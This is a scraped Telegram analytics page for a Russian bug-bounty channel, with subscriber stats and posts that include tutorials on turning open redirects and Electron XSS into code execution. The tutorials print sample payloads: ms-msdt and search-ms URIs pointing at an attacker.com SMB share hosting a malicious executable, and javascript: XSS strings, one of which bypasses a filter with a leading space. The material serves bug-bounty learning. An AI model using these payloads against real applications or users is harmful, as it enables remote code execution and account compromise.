en
Feedback
Записки Зёмы

Записки Зёмы

Open in Telegram

Канал одного клоуна-багхантера-пентестера. 17 y.o. third-year student of the TCMC (Information Security). Some not regular notes from and for myself. h1: zelenskyy && 0xlivebeef Quality content is not included. contact: t.me/damnwaree

Show more
306
Subscribers
No data24 hours
No data7 days
No data30 days

Data loading in progress...

Similar Channels
No data
Any problems? Please refresh the page or contact our support manager.
Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
November '23
November '23
+13
in 0 channels
October '23
+302
in 0 channels
Date
Subscriber Growth
Mentions
Channels
13 November0
12 November0
11 November+2
10 November+1
09 November+3
08 November+1
07 November+4
06 November+1
05 November0
04 November0
03 November+1
02 November0
01 November0
Channel Posts
Repost from Багхантер
😭😒🫕 Кузькина мать 30 октября 1961 года серьезные люди собрались на Новой Земле с одной целью - взорвать термоядерную авиац
😭😒🫕 Кузькина мать 30 октября 1961 года серьезные люди собрались на Новой Земле с одной целью - взорвать термоядерную авиационную бомбу "Кузькину мать" или по-другому "Царь-бомбу" (путем сброса её с самолета) на ядерном полигоне «Сухой Нос». Итоговая мощность взрыва составила примерно 58,6 мегатонн в тротилловом эквиваленте, что соответствует дефекту масс примерно 2.65 кг. В радиусе 35 километров от точки взрыва все здания были полностью уничтожены, ударная волна 3 раза обогнула Землю, а сама ядерная вспышка была видна на расстоянии более 1000 км. 14 октября 2023 года в 18:00 серьезные люди (сотни а может быть даже тысячи багхантеров и 10 докладчиков) соберутся онлайн на трансляции в канале "Багхантер" с одной целью - послушать доклады экспертов мирового уровня, известных багхантеров, специалистов по информационной безопасности с большим опытом. "Мы вам еще покажем кузькину мать!" Примерное расписание: завтра, в 18:10 - 18:30 - «Техобслуживание и ремонт системы питания дизельного двигателя» 18:30 - 18:50 - «Вкатываемся в Web3 на примере TON» 18:50 - 19:10 - «Вкатываемся в Web3» 19:10 - 19:30 - «Как сломать банкомат... через интернет!» 19:30 - 20:10 - «Логические баги из реальной жизни» 20:10 - 20:30 - «Generate werkzeug pins» 20:30 - 20:50 - «развитие ББ ВК» 20:50 - 21:10 - «нашёл SELF XSS не сдавайся» 21:10 - 21:30 - «Zerocode security v0.7 - Mobile builders» 21:30 - 21:50 - «Наступательные инструменты разработчика» 🐹 Багхантер

2
Недавно у Багхантер (кто не подписан, объяснитесь, как так вышло?) проходил конкурс, в котором нужно было написать про свою с
Недавно у Багхантер (кто не подписан, объяснитесь, как так вышло?) проходил конкурс, в котором нужно было написать про свою самую лучшую находку. Я принял участие и занял почётное 3 место. Получил носочки, значки, промо на +3к к репорту у ВК и стикеры. Спасибо огромное Юре за конкурс, а также вендорам за предоставленные призы <3 Статья про уязвимость будет уже скоро на канале.
0
3
Bug Bounty Tips #2 Сегодня затронем приложения на Electron. А конкретнее доведение XSS до RCE (ну или почти). Что может понадобиться для упрощения работы: Сканер electronegativity. Он нужен для сканирования Electron приложений на различные мисконфигурации; Сканер nodejsscan. Этот инструмент умеет в сканирование модулей nodejs, которые наверняка встроены в исследуемый продукт. Первым делом нужно найти XSS в исследуемом сервисе. Довольно часто её причиной становится Markdown (на своей практике встречал уже несколько раз). Найти больше информации по XSS в Markdown можно тут. Если XSS на нашем сайте не была найдена, нужно идти в код приложение и смотреть как приложения открывает ссылки. Кейс 1 - Внешние ссылки открываются во внешнем браузере. Решение - Искать мисконфигурации открытия. Например, проверки на то, что ссылка содержит https://example.com/, а не начинается на это. Ещё можно попытаться кликнуть средней кнопкой мыши. Кейс 2 - Внешние ссылки открываются в самом приложении. Если встретили такое поведение - вам упростили работу. Итак. Мы смогли найти XSS/возможность открыть внешние ссылки. Что дальше? - встраивать полезные нагрузки. Если electron приложение имеет мисконфигурацию в области работы с nodejs - вы сможете выполнить код. Если нет - смотрите на версию Electron. Вполне возможно, что попадётся версия, уязвимая к различным обходам nodeIntegration. Если выполнить код не удалось, то можно попытаться выполнить удалённый код/повысить импакт XSS при помощи различных URI схем. Примеры того, что можно использовать: ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\attacker.com\smb_share\malicious_executable.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update Эти "ссылки" необходимо открыть каким-либо образом. В случае с markdown их можно встроить в ссылки [Some Text](Payload), а затем открыть при помощи СКМ. Если вы нашли XSS/смогли открыть произвольную страницу - откройте при помощи window.open(Payload) На этих строчках подхожу к концу и желаю всем удачи в поисках уязвимостей. @zema_notes p.s. перечитал пост и понял. что кому-то может он показаться непонятным, поэтому если есть вопросы - пишите в комменты, постараюсь ответить.
0
4
Давно тут не появлялся. Разбавлю пустоту небольшими Tips для Bug Bounty. Часть будет многим известна, часть, но возможно, для кого-то станет чем-то новеньким. Всё же мой канал не только для профессионалов в сфере ИБ. Что же, BB Tips #1. XSS в Redirect. Представим ситуацию - вы нашли кнопку редиректа, значение которой подставляется со стороны пользователя. Open Redirect принимается мало где, именно поэтому нужно попытаться докрутить до XSS, чтобы был импакт. Как это сделать рассмотрим ниже. Вариант 1 (самый топорный, но часто срабатывает). Payload -javascript:alert(document.domain) Вставляем, кликаем и... Ничего не происходит. Нас просто отправляет на страницу about#blocked (или about#blank). Решение - кликать средней кнопкой мыши по ссылке. Hint: ещё это срабатывает с Markdown. Payload - [a](javascript:alert(document.domain)) Вариант 2. Если разработчики фильтруют строку, чтобы она не начиналась с javascript:, при помощи регулярного выражения следующего вида^(?!javascript:).+можно подставить пробел в начало нашей нагрузки. Если ссылка подставляется из параметров, поставьте %20, чтобы пейлоад приобрёл следующий вид: %20javascript:alert() Вставляем, кликаем СКМ, наслаждаемся XSS.
0